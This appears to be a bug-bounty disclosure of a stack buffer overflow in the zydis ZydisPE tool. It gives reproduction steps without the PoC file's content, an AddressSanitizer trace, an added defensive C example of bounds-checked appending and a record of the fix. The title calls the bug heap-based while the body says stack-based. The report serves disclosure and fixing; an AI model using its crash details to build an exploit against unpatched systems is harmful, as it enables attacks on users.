Heap-based Buffer Overflow in zyantific/zydis

Valid

Reported on

Nov 3rd 2021


As discussed in the report at https://www.huntr.dev/bounties/96b0a482-7041-45b1-9327-c6a4a8f32d3a/, I am re-opening the report here for proper tracking.

Description

Hello, we hope you're doing well during these challenging times. Whilst testing zydis built from commit 077b185 with Clang 12 + ASan on Ubuntu 18.04, we discovered a crafted PE file that, when fed to ZydisPE, triggers a stack-buffer-overflow during a memcpy operation in the zycore-c dependency, with a WRITE of size 20479.

Proof of Concept

Base64 POC

    decode base64 > /tmp/file.fuzz
    ./ZydisPE /tmp/file.fuzz

WRITE of size 20479 at 0x7ffe2bcf31e0 thread T0
    #0 0x36f4f9 in __asan_memcpy (/root/zydis/build/ZydisPE+0x36f4f9)
    #1 0x435bb6 in ZyanStringAppend /root/zydis/dependencies/zycore/src/String.c:462:5
    #2 0x3aff40 in ZydisFormatterPrintAddress /root/zydis/tools/ZydisPE.c:912:9
    #3 0x3af822 in ZydisFormatterPrintAddressABS /root/zydis/tools/ZydisPE.c:930:12
    #4 0x421d52 in ZydisFormatterIntelFormatInstruction /root/zydis/src/FormatterIntel.c:114:22
    #5 0x3efc60 in ZydisFormatterFormatInstructionEx /root/zydis/src/Formatter.c:472:5
    #6 0x3aba9c in DisassembleMappedPEFile /root/zydis/tools/ZydisPE.c:1068:22
    #7 0x3aba9c in main /root/zydis/tools/ZydisPE.c:1174:10
    #8 0x7f410ae1f564 in __libc_start_main csu/../csu/libc-start.c:332:16
    #9 0x2f4e3d in _start (/root/zydis/build/ZydisPE+0x2f4e3d)

Address 0x7ffe2bcf31e0 is located in stack of thread T0 at offset 3136 in frame
    #0 0x3a4c3f in main /root/zydis/tools/ZydisPE.c:1095

  This frame has 31 object(s):
    [32, 40) 'size.i125' (line 487)
    [64, 72) 'string.i126' (line 492)
    [96, 104) 'size.i' (line 487)
    [128, 136) 'string.i118' (line 492)
    [160, 180) 'decoder.i' (line 981)
    [224, 808) 'formatter.i' (line 991)
    [944, 2448) 'instruction.i' (line 1007)
    [2576, 2712) 'symbol.i' (line 1026)
    [2784, 2792) 'found_index.i89' (line 1029)
    [2816, 2824) 'element.i90' (line 1035)
    [2848, 2856) 'string.i' (line 1038)
    [2880, 3136) 'format_buffer.i' (line 1067)
    [3200, 3208) 'size.i.i' (line 487) <== Memory access at offset 3136 partially underflows this variable
    [3232, 3240) 'string.i.i' (line 492) <== Memory access at offset 3136 partially underflows this variable
    [3264, 3400) 'element.i' (line 544) <== Memory access at offset 3136 partially underflows this variable
    [3472, 3536) 'module_name.i' (line 563) <== Memory access at offset 3136 partially underflows this variable
    [3568, 3576) 'index.i' (line 572) <== Memory access at offset 3136 partially underflows this variable
    [3600, 3664) 'symbol_name103.i' (line 601) <== Memory access at offset 3136 partially underflows this variable
    [3696, 3704) 'found_index.i' (line 611) <== Memory access at offset 3136 partially underflows this variable
    [3728, 3792) 'module_name156.i' (line 632) <== Memory access at offset 3136 partially underflows this variable
    [3824, 3832) 'index170.i' (line 641) <== Memory access at offset 3136 partially underflows this variable
    [3856, 3864) 'found_index206.i' (line 666) <== Memory access at offset 3136 partially underflows this variable
    [3888, 3952) 'symbol_name229.i' (line 683) <== Memory access at offset 3136 partially underflows this variable
    [3984, 4120) 'element278.i' (line 717) <== Memory access at offset 3136 partially underflows this variable
    [4192, 4256) 'module_name308.i' (line 736) <== Memory access at offset 3136 partially underflows this variable
    [4288, 4352) 'symbol_name341.i' (line 764) <== Memory access at offset 3136 partially underflows this variable
    [4384, 4392) 'found_index356.i' (line 774) <== Memory access at offset 3136 partially underflows this variable
    [4416, 4480) 'module_name402.i' (line 795) <== Memory access at offset 3136 partially underflows this variable
    [4512, 4520) 'found_index424.i' (line 819) <== Memory access at offset 3136 partially underflows this variable
    [4544, 4608) 'symbol_name450.i' (line 836) <== Memory access at offset 3136 partially underflows this variable
    [4640, 4776) 'context' (line 1169) <== Memory access at offset 3136 partially underflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow (/root/zydis/build/ZydisPE+0x36f4f9) in __asan_memcpy
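The frame listing above puts the faulting write at offset 3136, exactly the end of the 256-byte format_buffer.i, so an append of untrusted length ran past a fixed-size stack buffer. As an added illustration (not zydis or zycore code; the bounded_string type and its functions are invented for this example), a capacity-checked append that rejects the oversized input instead of reaching memcpy:

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Fixed-capacity string standing in for the 256-byte stack buffer format_buffer.i
 * ([2880, 3136) in the ASan frame listing). Type and function names are invented
 * for this example, not zycore's real API. */
#define FORMAT_BUFFER_CAPACITY 256
typedef struct {
    char data[FORMAT_BUFFER_CAPACITY];
    size_t length;               /* bytes in use, excluding the terminator */
} bounded_string;

enum append_status { APPEND_OK = 0, APPEND_TOO_LONG = 1 };
static void bounded_init(bounded_string *s) { s->length = 0; s->data[0] = '\0'; }

/* Append len bytes of src. Refuses anything that does not fit with the NUL
 * terminator, checking the addition for wrap-around first so a huge len cannot
 * slip past the capacity test. On failure nothing is written. */
static enum append_status bounded_append(bounded_string *s, const char *src, size_t len)
{
    if (len > SIZE_MAX - s->length)                /* length + len would wrap */
        return APPEND_TOO_LONG;
    if (s->length + len >= FORMAT_BUFFER_CAPACITY) /* keep room for '\0' */
        return APPEND_TOO_LONG;
    memcpy(s->data + s->length, src, len);
    s->length += len;
    s->data[s->length] = '\0';
    return APPEND_OK;
}

/* The reported shape, built in memory: a 20479-byte "symbol name" (the WRITE
 * size in the sanitizer output), constructed here rather than read from a file. */
static enum append_status append_oversized_symbol(bounded_string *s)
{
    static char huge[20479];
    memset(huge, 'A', sizeof huge);
    return bounded_append(s, huge, sizeof huge);
}

int main(void)
{
    bounded_string s;
    bounded_init(&s);
    bounded_append(&s, "call 0x", 7);
    printf("%s, buffer still \"%s\"\n", append_oversized_symbol(&s) == APPEND_TOO_LONG ? "rejected" : "accepted", s.data);
    return 0;
}
```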

Impact

Crashing the software, local denial of service, maybe arbitrary code execution?

References

We are processing your report and will contact the zyantific/zydis team within 24 hours. (a year ago)
We have contacted a member of the zyantific/zydis team and are waiting to hear back. (a year ago)
Joel Höner validated this vulnerability. (a year ago)
geeknik has been awarded the disclosure bounty.
The fix bounty is now up for grabs.
Joel Höner confirmed that a fix has been merged on 330b25. (10 months ago)
The fix bounty has been dropped.